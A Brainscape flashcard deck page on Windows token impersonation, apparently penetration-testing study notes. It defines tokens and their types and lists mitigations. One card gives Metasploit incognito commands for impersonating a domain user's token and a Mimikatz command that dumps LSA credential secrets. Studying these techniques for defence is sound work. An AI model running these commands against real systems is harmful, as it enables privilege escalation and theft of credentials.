Brainscape's Knowledge GenomeTM

Browse over 1 million classes created by top students, professors, publishers, and experts.


See full index

Attacks on Windows > Token Impresonation > Flashcards

Token Impresonation Flashcards

1
Q

What is a token

A

Temporary keys (cookie for system)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

How many types of token exists ?

A

2 types:
- Delegate
- Impersonate

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Pop a shell and load incognito (msf module) => Token Impersonation

A

msf > impersonate_token marverl\fcastle
msf > shell
msf> whoami

(If admin token =>)
msf> Invoke-Mimikatz -Command ‘“privilege::debug” “LSADump::LSA/patch” exit’ -Computer HYDRA?marvel.local

msf > privilege::debug

msf > LSADump::LSA /patch

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Mitigation of Token Impersonation

A
  • Limit user/group token creation permissions
  • Account tiering
  • Local admin restriction
How well did you know this?
1
Not at all
2
3
4
5
Perfectly

Attacks on Windows (11 decks)

Brainscape helps you reach your goals faster, through stronger study habits.
© 2024 Bold Learning Solutions. Terms and Conditions